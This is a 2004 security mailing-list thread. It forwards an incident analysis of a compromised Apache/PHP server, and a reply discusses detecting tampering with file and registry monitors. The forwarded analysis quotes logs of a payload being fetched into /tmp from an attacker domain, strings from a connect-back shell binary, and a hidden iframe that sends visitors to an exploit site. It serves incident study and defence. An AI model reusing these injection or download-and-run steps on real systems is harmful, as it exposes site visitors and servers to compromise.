[Owasp-dotnet] (interresting analysis of a Web Server Attack on Apache) [Fwd: [Full-Disclosure]xpire.info & splitinfinity.info - exploits in the wild]
michaels at phg.com.au
Sun Oct 24 19:17:57 EDT 2004
But what would the checksum check ? All the attacker needs to do is
put something in the registry and link it to his program which does all
the work ... you can't use the registry in the sum as that would be too
different ... maybe you could include some common keys which could be
used for autostarting programs, etc ... but iirc there are many ways to
autostart a program, not only the reg.
Perhaps an interesting angle would be to setup a monitoring system
around tools like filemon and regmon and note changes to
interesting locations. Of course, an attacker could simply shutdown
these tools (or, if serving out information to a remote source; fake the
output) so it's not perfect, but could be interesting ... and if the
tool was shutdown it would indicate an attack and the entire server
could be shutdown to prevent too much damage occuring ...
 filemon - http://www.sysinternals.com/ntw2k/source/filemon.shtml
 regmon - http://www.sysinternals.com/ntw2k/source/regmon.shtml
From: Dinis Cruz [mailto:dinis at ddplus.net]
Sent: Sunday, 24 October 2004 10:35 PM
To: owasp-dotnet at lists.sourceforge.net
Cc: eflorio at edmaster.it
Subject: [Owasp-dotnet] (interresting analysis of a Web Server Attack on
Apache) [Fwd: [Full-Disclosure]xpire.info & splitinfinity.info -
exploits in the wild]
See bellow a post made today by Elia Florio on the Full Disclosure
This is the kind of attacks that I am worried about given the current
insecure Full Trust Asp.Net world (you wouldn't need an exploit, only a
The other interesting issue is the Rootkit scenario and the types of
attacks that are possible when the Malicious Hacker changes the behavior
of the underlying OS or Web Server.
I also like the idea of being able to check the md5sum of the core OS
and Web Server. but how can it be done at the moment since there is no
support from Microsoft (i.e. tools and a 'secure' location updated
Microsoft's product's md5sum?)
-------- Original Message --------
Subject: [Full-Disclosure] xpire.info & splitinfinity.info -
exploits in the wild
Date: Sun, 24 Oct 2004 13:47:04 +0200
From: Elia Florio <eflorio at edmaster.it> <mailto:eflorio at edmaster.it>
To: <full-disclosure at lists.netsys.com>
<mailto:full-disclosure at lists.netsys.com>
i'm doing some analysis on a Linux-Mandrake 9.0 web server
of a person that was compromised in October.
In this host now it's installed a special trojan that insert a
malicious <IFRAME> tag into every served .PHP page.
The host is running these services :
Porta 21: 220 ProFTPD 1.2.5 Server (XXXXXXX FTP Server) [server]
Porta 22: SSH-1.99-OpenSSH_3.4p1
Porta 25: 220 XXXXX ESMTP 5.5.1
Porta 110: +OK <XXXX at XXXXXX>
Porta 3306: MySQL 3.23.52
Porte 80/443: Server: Apache-AdvancedExtranetServer/1.3.26 (Mandrake
sxnet/1.2.4 mod_ssl/2.8.10 OpenSSL/0.9.6g PHP/4.2.3
I've found inside Apache log that the hacker break-in inside the machine
using an overflow and injecting an executable /tmp/a.out via
These are the suspicious log lines :
[Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal
[Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal
[Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal
[Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal
qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S.
<angdimar at yahoo.it> <mailto:angdimar at yahoo.it>
[Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal
[Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal
[Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal
qmail-inject: fatal: unable to parse this line:
To: Drugo:Lebowski at libero.it
sh: -c: option requires an argument
Resolving xpire.info... fatto.
Connecting to xpire.info[22.214.171.124]:80... connected.HTTP richiesta
inviata, aspetto la risposta... 200 OK
Lunghezza: 19,147 [text/plain]
0K .......... ........ 100% 9.97K
15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]
[Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal
[Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal
Tryin a WGET of http://xpire.info/cli.gz , I get an ELF executable for
possible containing a ConnectBack shell. Inside this ELF file you can
Usage: %s host port
pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i
fork pty, bye!
Fuck you so
/bin/sh No connect
Looking up %s... Failed!
%u Connect Back
I don't know if the hacker installs in this machine a rootkit, but the
of md5sum of
ls, lsof, ps, netstat binaries with other ones from a clean Mandrake
The main problem is finding how the Apache Server (or PHP) was altered
because every user that connects to this host now, could be infected by
several HTML/IE recent exploits.
Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in
The script is :
Decoding it, I see that it writes inside the page an <IFRAME> tag
to this url :
<iframe src='http://www.splitinfinity.info/fa/?d=get' height=1
If you surf to this page (don't do this if you use IE or are not
you could got infected
by several exploits, cause it opens a lot a <iframe> pointing out to
I would to list here these domains, cause they are a sources
for exploit studying :
Found Java class exploit
My questions are :
httpd.conf and a lot of PHP pages,
but I don't found anything.....Is it possible that the hacker install
compromised Apache module ..so???
2) anyone knows before these sites (xpire.info or splitinfinity.info)?
why they are still online and are serving trojan/exploit on surfer
xpire.info is related to "Mike Fox".....but it sounds as a fake Jonh Doe
Domain ID: D5946452-LRMS
Domain Name: XPIRE.INFO
Created On: 23-May-2004 19:41:15 UTC
Last Updated On: 02-Aug-2004 08:07:20 UTC
Expiration Date: 23-May-2005 19:41:15 UTC
Sponsoring Registrar: Direct Information Pvt Ltd. d/b/a
Registrant ID: C4752858-LRMS
Registrant Name: Mike Fox
Registrant Organization: n/a
Registrant Street1: Hali-gali, 77
Registrant City: Deli
Registrant Postal Code: 12345
Registrant Country: IN
Registrant Phone: +91.226370256
Registrant Email: c8idkvtgarwinidkvt38 at yahoo.com
3) how can I understand if a rootkit was installed???
Thanks anyone for replies
Full-Disclosure - We believe in it.
------------------------------------------------------- This SF.net
email is sponsored by: IT Product Guide on ITManagersJournal Use IT
products in your business? Tell us what you think of them. Give us Your
Opinions, Get Free ThinkGeek Gift Certificates! Click to find out more
_______________________________________________ Owasp-dotnet mailing
list Owasp-dotnet at lists.sourceforge.net
This email message and accompanying data may contain information that is confidential and/or subject to legal privilege. If you are not the intended recipient, you are notified that any use, dissemination, distribution or copying of this message or data is prohibited. If you have received this email message in error, please notify us immediately and erase all copies of this message and attachments.
This email is for your convenience only, you should not rely on any information contained herein for contractual or legal purposes. You should only rely on information and/or instructions in writing and on company letterhead signed by authorised persons.
-------------- next part --------------
An HTML attachment was scrubbed...
More information about the Owasp-dotnet